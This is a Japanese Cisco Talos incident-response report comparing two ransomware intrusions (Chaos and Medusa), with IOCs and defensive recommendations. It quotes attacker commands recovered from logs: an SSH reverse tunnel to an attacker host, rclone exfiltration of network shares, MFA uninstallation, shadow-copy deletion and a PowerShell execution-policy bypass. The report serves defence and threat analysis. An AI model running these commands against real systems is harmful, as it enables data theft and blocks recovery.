- Cisco Talos が日常的に対応するランサムウェア事例には、攻撃ライフサイクルの早い段階で被害組織が対処を開始していれば被害を軽減または完全に回避できたであろうケースが少なくありません。ここでは、ランサムウェア攻撃への早期介入の重要性を示す例として、Cisco Talos インシデント対応チーム(Talos IR)が最近対処した 2 件のランサムウェア事例を取り上げます。
- 第 1 のインシデントでは、悪意のある活動のアラートに気づいた被害者がすぐに Talos IR に連絡しました。Talos IR は迅速に対応し、以後発生し得る悪意のある活動に対抗することにより、環境内での暗号化の実行を防ぐことができました。
- 一方、第 2 のインシデントでは、被害者は悪意のある活動のアラートを無視し、Talos IR に連絡が届いたのはランサムウェアバイナリの実行が始まってからでした。それから 1 日以上にわたり、Talos IR は分析のためのネットワークアクセスができず、その間に被害者のホストはほぼ 100% 暗号化されてしまいました。
- ランサムウェア攻撃の成功とシビラティ(重大度)に関係し得る要因は、攻撃者の巧妙さや高度なツールなど数多くありますが、これら 2 件のランサムウェア事例は非常によく似ていることから、両攻撃の結果の違いにこれらの要因が大きく影響したとは考えられません。
はじめに
ランサムウェアの攻撃者は潜伏期間(最初のアクセスから暗号化までの期間)の短縮に日々努めているため、迅速なインシデント対応の心がけがますます重要になっています(情報源:Infosecurity Magazine
、CyberScoop、Orca、ThreatDown)。早期の介入と修復により、金銭的損失、風評被害、法的責任など、ランサムウェア攻撃による影響を大幅に軽減、あるいは完全に防ぐことができます。これは、Talos IR が最近扱った 2 件の事例の比較からも明らかです。
どちらの事例も、攻撃者が利用したツールや戦術、手法、手順(TTP)は類似しており、被害者はランサムウェアの実行前に不審な活動に関するアラートを受けていましたが、一方の事例ではネットワークの暗号化が 0% だったのに対し、他方の事例ではほぼ 100% 暗号化されてしまいました。
この暗号化はいくつかの重要な瞬間に生じた遅れに起因すると Talos は評価しています。まず、早期に警告があったにもかかわらず、ランサムウェアバイナリが実行されるまで連絡がなかったことから、Talos は IR 業務に着手できず、暗号化の開始を許すことになりました。次に、対応業務の開始から 30 時間以上被害者のネットワークにアクセスできず、その間に広範囲にわたり暗号化が行われました。Talos のデータによると、ランサムウェアの亜種の多くは、最初のアクセスからネットワークを完全に制御するまでに 24 ~ 48 時間しかかかりません。さらに、対応が遅れている間に攻撃者が防御策を講じたため、Talos は脅威の修復とネットワーク強化に向けた重要なステップであるシステムログの遡及分析を大幅に制限されました。
攻撃ライフサイクルの詳細
事例 1:暗号化を伴わないデータ窃取
4 月下旬、Chaos ランサムウェアの攻撃者は、ソーシャルエンジニアリングを通じて被害者の環境への最初の足掛かりを得ました。攻撃者はまず、あるユーザーに大量のスパムメールを送信した後、IT サポートを装って Microsoft Teams でそのユーザーに連絡を取りました。Microsoft Teams のセッション中、攻撃者はユーザーに Microsoft Quick Assist を起動させ、未知のログインページにログイン情報を入力させることで、最終的にそのアカウントにアクセスできるようになりました。同日、被害者はセキュリティ侵害のアラートを受け、Talos IR に脅威の軽減を依頼しました。そのため Talos IR は、アクティビティログを完全に削除または改ざんされる前に、ログを確認することができました。
攻撃者は侵害後の活動で LoLBin(Living-Off-The-Land binary、環境寄生型バイナリ)とデュアルユースツールを多用していました。また、Impacket の「atexec.py」モジュール(具体的には、タスク スケジューラー サービス)を使ってリモートからコマンドを実行しました。攻撃者は「ipconfig /all」(ネットワーク接続の一覧表示)、「nltest /dclist」(Active Directory(AD)内のドメインコントローラ(DC)の一覧表示)、「quser.exe」(ユーザーセッション情報の照会)などの Windows コマンドライン ユーティリティを使用して被害者の環境を調査し始めました。また、OpenSSH(リバースプロキシ SSH 接続を確立するための暗号化通信チャネルを提供するオープンソースのセキュア ネットワーク ユーティリティ スイート)を使用して、攻撃者の管理下にある IP アドレスに複数のアウトバウンド接続が行われていることも確認されました。
C:\Windows\System32\OpenSSH\ssh.exe -R :12840 -N REDACTED-p 443 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no
攻撃者は、環境内でラテラルムーブメントを行うために、Microsoft リモートデスクトップと Advanced IP Scanner を使用して新しいアカウントへのアクセスを取得し、アカウントのパスワードを変更してユーザーをロックアウトすることで永続性を維持しました。
特に注目すべき点は、攻撃者が複数のシステム層(ワークステーション、サーバー、DC など)で別々のリモートモニタリングおよび管理(RMM)アプリケーションを使用して、攻撃作戦の複数のフェーズにおいてリモートアクセスを持続的に確保していたこと、また、次のようにそれぞれ若干異なる機能を実行していたことです。
- Microsoft Quick Assist を使用し、ソーシャルエンジニアリングを用いて被害者に初回アクセス用のツールをインストールさせました。
- 侵害されたシステムの大半で AnyDesk が見つかったため、AnyDesk がリモートアクセスの主な方法であったと考えられます。
- OptiTune を利用して多数のホストに ScreenConnect RMM を展開しました。
- SplashTop を利用して、少なくとも 1 つのホストでアクティビティを列挙しました。
攻撃者は、ホストから Duo をアンインストールするなど、検出を回避するための予防措置も講じました。
C:\WINDOWS\system32\cmd.EXE, /c, wmic, product, where, name=Duo Authentication for Windows Logon x64, call, uninstall, /nointeractive:
以下のように、名前を変更した Rclone 実行ファイルをコマンドラインから実行し、ネットワーク共有からファイルをコピーしていました。
wininit.exe, copy, --max-age, 1y, --exclude, *{psd,7z,mox,pst,FIT,FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi}, \\REDACTED\data, REDACTED/data, -q, --ignore-existing, --auto-confirm, --multi-thread-streams, 25, --transfers, 15, --b2-disable-checksum, -P
最後に、最初のアクセスからわずか数時間後、攻撃者は「backup.sh」スクリプト(ESXi ホストに見られる通常のプロセス)を起動しました。Talos IR は、攻撃者がこのスクリプトを利用してランサムウェアの実行ファイルを配信したのではないかと疑っています。被害者の VPN 上のデータを暗号化しようとする試みが確認されましたが、最終的には失敗に終わりました。
事例 2:ほぼ 100% の暗号化
第 2 の事例では、シスコの Managed Detection and Response(MDR)が悪意のある活動についてアラートを発したにもかかわらず、被害者はこれを無視し、Medusa ランサムウェアのバイナリの実行が始まって初めて Talos IR に連絡が届きました。それから 1 日以上にわたり、Talos IR は分析のためのネットワークアクセスができず、その間に被害者のホストはほぼ 100% 暗号化されてしまいました。
暗号化後に残った限られたログを遡及的に分析した結果、この攻撃者も同じくデュアルユースツールを使用していることが明らかになりました。リモートアクセスには、正規の RMM ツールである SimpleHelp が使用されていました。このツールはランサムウェア攻撃者に悪用されることが多く、2025 年 1 月以降、パストラバーサルに日常的に悪用されています(CVE-2024-57727)。Talos IR は、不審な IP アドレスからのリモートデスクトップ接続、悪用されることの多い Brute Ratel C4(BRC4)レッドチームツールからのビーコンアクティビティ、そしてデータ収集に利用できる Windows API の呼び出しも確認しました。
- Getnativesysteminfo は、プロセッサの種類、プロセッサの数、メモリページサイズなど、システムのベースとなるハードウェアアーキテクチャと特性を取得します。
- Telemetry:api_invoke は、Telemetry API の呼び出しです。攻撃者は、api_invoke イベントを監視またはトリガーすることで、どの API が利用可能か、どのユーザーまたはサービスがどの API を呼び出しているか、どのクラウドサービスが使用されているかを把握し、対応する「telemetry:api_invoke」ログから環境を列挙することができます。
- Bcryptgeneratesymmetrickey は AES 復号用のキーを生成します。
攻撃者は、SimpleHelp のコンポーネントである JWrapper を使用してコマンドアンドコントロール(C2)を確立しました。JWrapper は IT サポートでよく使用されるため、悪意のあるものとは判定されない可能性があります。また、JWrapper は Java アプリケーションを Windows、macOS、Linux のネイティブ実行形式にパッケージ化するように設計されているため、ファイルを密かに実行し、データを漏洩させる目的にも利用できます。攻撃者は今回の攻撃で JWrapper を使用し、Windows の PromptOnSecureDektop レコードを False に設定することで、レジストリのユーザーアクセス制御を無効にするファイルを実行しました。
C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access Bundle-00112084494\JWrapperTemp-1745261021-3-app\bin\ windowslauncher.exe \MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop
JWrapper はデータ漏洩にも使用された可能性があります。
C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access Bundle-00112084494\JWrapperTemp-1745261021-3-app\bin\windowslauncher.exe
攻撃者は、不正アクセスによって System32 フォルダ内のファイルをリモートで読み取って変更し、このフォルダからボリュームシャドウコピーを削除しようとしました。System32 フォルダは Windows OS に不可欠な部分であり、システムが正常に機能するうえで欠かせない重要なファイルが含まれています。ボリュームシャドウコピーの削除は、データのリカバリを阻止するための一般的な戦術です。
C:\Windows\System32\vssadmin.exe 'delete' 'shadows' '/shadow={5aa57685-c258-4396-b702-6722ab58e603}
攻撃者は、PsExec のリモートコピーと実行を介して、System32 フォルダ内で Impacket も実行しました。
C:\Windows\system32\services.exe, C:\Windows\system32\msiexec.exe /V, C:\Windows\syswow64\MsiExec.exe -Embedding 27A094D718378410D2002AE3023D3731 E Global\MSI0000
分析
Talos IR は、両事例間の影響の違いをもたらした主な要因は被害者の対応のタイミングにあると評価しています。攻撃者の洗練度、被害者のエンドポイントセキュリティ、Talos IR の対応など、他の要因はいずれもよく似ていました。どちらの攻撃も、ツールの洗練度は類似しており、攻撃ライフサイクル全体を通して LoLBin とデュアルユースツールが多用されていました。例として Msiexec、WMIC、PowerShell といった LoLBin と正規の RMM ツールの共用が挙げられます。また、どちらの攻撃も、新しいペイロードを展開することなく、SMB または WMI 経由でリモートからコマンドを実行するために Impacket を使用しており、マルウェアを拡散するために ADMIN$ 管理共有を使用していました。より洗練された攻撃者であれば、最近発見された Betruger バックドアに似た、ランサムウェア攻撃ではほとんど見られないカスタムマルウェアを選択した可能性があります。
どちらの事例も、広範なネットワークアクセスを獲得するために使用された戦術、手法、手順(TTP)の洗練度は同程度でした。攻撃者はファイル、ログ、ツールを削除または変更することで検出と分析を回避しようとし、被害者の System32 フォルダと管理者アカウントの侵害に成功しました。
Talos IR は、これら 2 件の事例に多少違いがあることは認めていますが、それらは重大な差を生むものではありません。たとえば両事例では、IP スキャン用としてそれぞれ異なる正規の有料ソフトウェアが使用され、RMM ツールもそれぞれ異なるものが使用されましたが、これらの相違によって被害者への影響度にそれほど大きな差は生まれなかったと考えられます。
また、どちらの被害者も、旧バージョンである PowerShell 1.0 を使用しているというエンドポイントセキュリティ上ほぼ同じ脆弱性を抱えており、この脆弱性が悪用されたことが確認されました。PowerShell 1.0 には、後継バージョンに搭載されている重要なセキュリティ機能がいくつか欠けており、悪意のある活動の検出と分析が困難です。たとえば PowerShell 1.0 の実行ポリシーは、インライン実行「powershell.exe -ExecutionPolicy Bypass」を使用するか、メモリまたはレジストリ内のポリシー値を変更することで簡単にバイパスできます。これは、スクリプトがデジタル署名や検証なしで実行できることを意味し、ランサムウェアのペイロードを実行する一般的な手段となっています。さらに、PowerShell 1.0 は、後継バージョンで .NET クラスや API へのアクセスを制限する制約言語モード(CLM)をサポートしておらず、.NET クラスや API がラテラルムーブメントや権限昇格に悪用される可能性があります。CLM がない場合、攻撃者はレジストリ操作、WMI クエリ、COM オブジェクトの相互作用、生の .NET アセンブリの読み込みなど、PowerShell の機能全体に無制限にアクセスできるようになります。これらはすべて、永続性の確立や権限昇格に使用できます。
最後に、どちらの被害者も、ランサムウェアの実行前に悪意のある活動に関する通知を受け取りました。連絡を受けた後、Talos は両被害者に対して同レベルの支援を提供しました。
タイムリーなログ分析による迅速な復旧
第 1 の事例では、被害者から早期に連絡を受け、その後も継続的にコミュニケーションが取れたことにより、Talos IR は削除または改ざんされる前のシステムログにアクセスできました。これが、暗号化の回避につながったと考えられます。次の多くの理由から、ログはランサムウェア攻撃への対応において重要な要素です。
- 悪用されたネットワークセキュリティの弱点を特定し、修正につなげる。
- どのデータが侵害されたかを把握することで、考えられる余波を理解し、影響を受けるお客様に通知する。
- 不審な振る舞いを示す逸脱を簡単に検知できるようにベースラインを確立する(ランサムウェアの攻撃者の多くが正規のツールを利用していることを考えると特に重要)。
- 攻撃者が日常的に使用するツールと TTP を特定する。これにより、今後の悪意のある活動を検知する方法や、その防止のために検出システムを配置すべき場所を把握できるほか、活動を行っている攻撃者を特定できる可能性もある。
- 攻撃者がアクセスする可能性があるデータを保護するために、攻撃者の目的(金銭の窃取やスパイ活動など)を特定する。
- 特定の標的が侵害されることを示す明確な経路を観察したり、侵害時に失敗した試みを確認したりすることで、標的を事前に強化する。
活動に共通点があったことから、Talos IR は修復に関して各被害者に類似した推奨事項を提供しましたが、Talos IR の対応を依頼するまでに時間がかかった事例では、確認可能なログが限られており、発生した悪意のある活動の全容と、攻撃者によるネットワークの侵害方法を Talos が把握できなかったため、被害者が受け取った推奨事項はやや一般的な内容になりました。
| ログへのアクセスが制限される場合の推奨事項 | ログに基づいてカスタマイズした 推奨事項 |
|
| RMM ソフトウェアの悪用の対策 | 会社から許可された RMM ソフトウェアのみ使用を許可し、それ以外の RMM はすべてブロックします。 | 悪意のある SSH リモート接続に基づいて、悪意のある IP を必ずブロックします。また、ファイアウォールレベルでの SSH のブロックも検討してください。 |
| パスワードの保護 | すべての特権アカウント、サービスアカウント、ユーザーアカウント、ローカルアカウントを含むすべてのアカウントのパスワードの一斉リセットを実行します。 | 攻撃者はホストにアクセスしており、ブラウザに保存されている非暗号化データにアクセスできていました。今後こうした脆弱性を防ぐには、ユーザーがブラウザにログイン情報や PII(個人を特定できる情報)を保存できないように GPO を実装してください。 |
| 攻撃者によるラテラルムーブメントの阻止 | ログを十分に確認できないため、推奨事項を提供できません。 | ハイブリッド AD アプローチから Entra ID への移行を検討してください。そうしておけば、環境内での攻撃者のラテラルムーブメントを防げていたと考えられます。 |
推奨事項
- フィッシング攻撃やソーシャルエンジニアリングに対する意識を高めます。ランサムウェアの攻撃者は、さまざまな手法を駆使して初回アクセスを行うことに長けているため、ユーザー教育が非常に重要です。フィッシング攻撃を見抜き、MFA バイパス手法への対策を行い、不正アクセスの報告先を把握できるようにユーザーを教育します。
- PowerShell などのシステム管理ツールの不必要な使用や不正使用を監視して防止し、ゼロトラストの原則を遵守します。正当な業務目的でこれらのツールを必要とする従業員のみにアクセスを制限してください。これらのツールの使用はログに記録し、監査する必要があります。
- ログの改ざんや削除を防止します。組織全体のユーザーまたはロールが特定のサービスにアクセスしたり、サービス内で特定のアクションを実行したりできないように、クラウドベースのリソースに対するサービス制御ポリシー(SCP)の作成を検討してください。たとえば SCP を使用すると、ユーザーによるログの削除、仮想プライベートクラウド(VPC)の設定の更新、ログ設定の変更を制限できます。さらに、プロセス実行イベントをログに記録し、Sysmon を導入して Windows デバイスのログ機能を強化してください。
- RMM とデュアルユースツールの使用を制限します。RMM ソフトウェアの実行ログを確認して、RMM ソフトウェアがメモリにのみロードされているなどの異常な使用を検出し、ネットワーク境界で一般的な RMM ポートおよびプロトコルにおける受信接続と送信接続の両方をブロックします。
- 不正な開示や漏洩を防ぐために、データ損失防止(DLP)戦略を採用します。これには、データ分類ポリシー、データ取り扱いポリシー、ユーザーの意識向上とトレーニング、そして不正なデータ転送の試みを識別してブロックできる DLP ソフトウェアが含まれます。
保護情報
Chaos
Unix.Malware.Chaos-6474834-0
シグニチャ名:Unix.Malware.Chaos-6474902-0
45975
Medusa
63929, 63928
300998
33058-33060
シグニチャ名:Andr.Ransomware.Medusa-10033530-0
シグニチャ名:PUA.Win.Tool.BestCrypt-10033531-0
シグニチャ名:Win.Ransomware.Medusa_Note-10033532-0
侵害の指標(IOC)
Chaos
| ファイル名 | SHA256 | ステータス/説明 |
| Wavesor.exe | 19ab3c8645d6806ae8a1dad707a86aba344a48d1612aeb5aa145f96ac0e24a03 | 重要な情報を取得するために使用できるマルウェア |
| wininit.exe | 5540f27f12db5a9e954727079665a282f905a0be787b76d798ca79a318d197f5 | 名前が変更された rclone |
| Advanced_IP_Scanner_2.5.4594.1.exe | 26d5748ffe6bd95e3fee6ce184d388a1a681006dc23a0f08d53c083c593c193 | 検出に使用される IP スキャナ |
| screensaver.exe | 87b3e3462263d7d42dea2bac6c3144181bab22092276f527a94a33af473066d5 | ScreenConnect |
| otservice.exe | b5c63f895d27d0572289cb49058ea83b1e49c46a62ca51b4ab44d119111594a4 | ScreenConnect を展開するために使用される OptiTune RMM |
| supportcenter.exe | 1ede8d91db625a605535488d1c36a5ea7ba3950194cabe7664ffa7ed6a9aab45 | OptiTune RMM |
| bvscript.exe | 9d2fe8a4a229ed2990e33a0330a00c03a415435c3cabd9a42dd882673522bee4 | OptiTune RMM Bravura スクリプトホストツール |
| otpowershell.exe | 10a87144386b2869d1bbc40e50f6960d4eb4316d1fd1c1df8708361a7b837b98 | OptiTune PowerShell ツール |
| remoteservice.exe | 4b6ff966ec6509e86c4a1cbf71d71bf434e08e0aae097a57015ad493db4a3912 | OptiTune リモートサービスツール |
| realtimeagent.exe | 6a3072a2367329b564c9bf77302a5fbf66673fb471c22fc56a12e901c4d90477 | OptiTune リアルタイム エージェント ツール |
| advanced_ip_scanner.exe | 4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5 | 検出に使用される IP スキャナ |
| goodsync.exe | 8127614d1906befc82ebc75fc0992e7dbad64ed2233fe316df611bf89ac4df2e | データ漏洩ツール |
| screenconnect.exe | 05016485b683ef6d40bfd805702924909197ee2483a66ffc8a22dc03e4891045 | ホスト「PKIWEBSVR」に配置される不明な実行ファイル |
| syncro.installer.exe | 845f4d73a0d96898535593c411d924d8c8c3af1dd3ead5f824242bb841d53c8e | Syncro RMM インストーラ |
| setuputil.exe | 1837087e75de428c18acec7f2ef7576752396a3a1ef15450230734e9ee194b28 | Splashtop Streamer インストーラ |
| anydesk.exe | 6ccea6a959128112613d7a82c067f8ccc78f05f1f8f47348fc9fecf269f0f21a | AnyDesk の悪用 |
| QuickAssist.exe ms-quick-assist | 8f67faad634acf0f2971caf8b7ac96e8f05de795b74feec8b82ea168b7be820b | 「最初の被害者」にソーシャルエンジニアリングを通じて実行させた実行ファイル |
| splashtop.exe | 03a613c62ae7470e70e0197ea5133625308dc2ac2c5574608d2b6e20c8f94015 | Splashtop |
| splashtop_sos.exe | 61f281c24846d311031521d13c933c42b33c7283d425456f00cf0ef3ffb04863 | Splashtop |
| ドメイン、URI パス、または IP アドレス | ステータス/説明 |
| 144.172.103[.]42 | リバースプロキシ SSH 接続を確立するために使用される、攻撃者の管理下にある IP アドレス |
| 45.61.134[.]36 | リバースプロキシ SSH 接続を確立するために使用される、攻撃者の管理下にある IP アドレス |
| civicoscolombia[.]com | 悪評があり、データ漏洩の兆候が見られるドメイン |
| 104.21.44[.]57’ | 悪意のあるドメイン civicoscolombia[.]com の IP |
Medusa
| ファイル名 | SHA256 | ステータス/説明 |
| windowslauncher.exe
remote access.exe |
11e7f8b671ed39497c8561b0ecd13496080681c21a457d6079817a90de553bf1’ | SimpleHelp リモート アクセス クライアント |
| storm.exe | ee6d24410a8cf31d672d2a47466b76ad287c7ba016d3711490f0f607b1dc0be3 | SimpleHelp リモート アクセス クライアント |
| psexecsvc.exe | cc14df781475ef0f3f2c441d03a622ea67cd86967526f8758ead6f45174db78e | Microsoft Sysinternals PsExec |
| Remote AccessLauncher.exe | 1e43e202a6e5d3059c3901a63fd69b32a7c0719c9f4c4f592a71c85e08e5d188 | SimpleHelp リモート アクセス クライアント |
| session_win.exe | 6e5f719d4c319e6aab1440f149d8d1dcb512a8f558b62311a0a5d5af366074ff | SimpleHelp リモート アクセス クライアント |
| ipscan-win64-3.0-beta6.exe | 8c1ec962a5e01d8717f6391af96c973600797c5285bcac1ac939a8d59e40e64e | Angry IP Scanner |
| remote access service.exe | dfee42845dd0ba873411df0ea1a917a7f2c1ddd9c024d325ce76aea90a9c9c51
733fc3b203e9b46d1dd8bfdeea3efd2adc569ef6806bdc15b077623670ad52e1
34df37643dab68d3d3b36c415b6b9fd1842c475c088007081ee613a780fd1c2c |
SimpleHelp リモート アクセス クライアント |
| winpty-agent64.exe | 586a2d7d3092b364db3cbb5a7dbc83cf7ef233338c4172c1bae6587f8b374cab | 端末接続を管理するための SimpleHelp ユーティリティ |
| ドメイン、URI パス、または IP アドレス | ステータス/説明 |
| 213.183.63[.]41 | コマンドアンドコントロールの SimpleHelp リモートアクセスの IP アドレス |
| 89.36.161[.]17 | コマンドアンドコントロールの SimpleHelp リモートアクセスの IP アドレス |
| 143.110.243[.]154 | 不審なデータ漏洩の IP アドレス |
本稿は 2025 年 7 月 16 日にTalos Group
Authors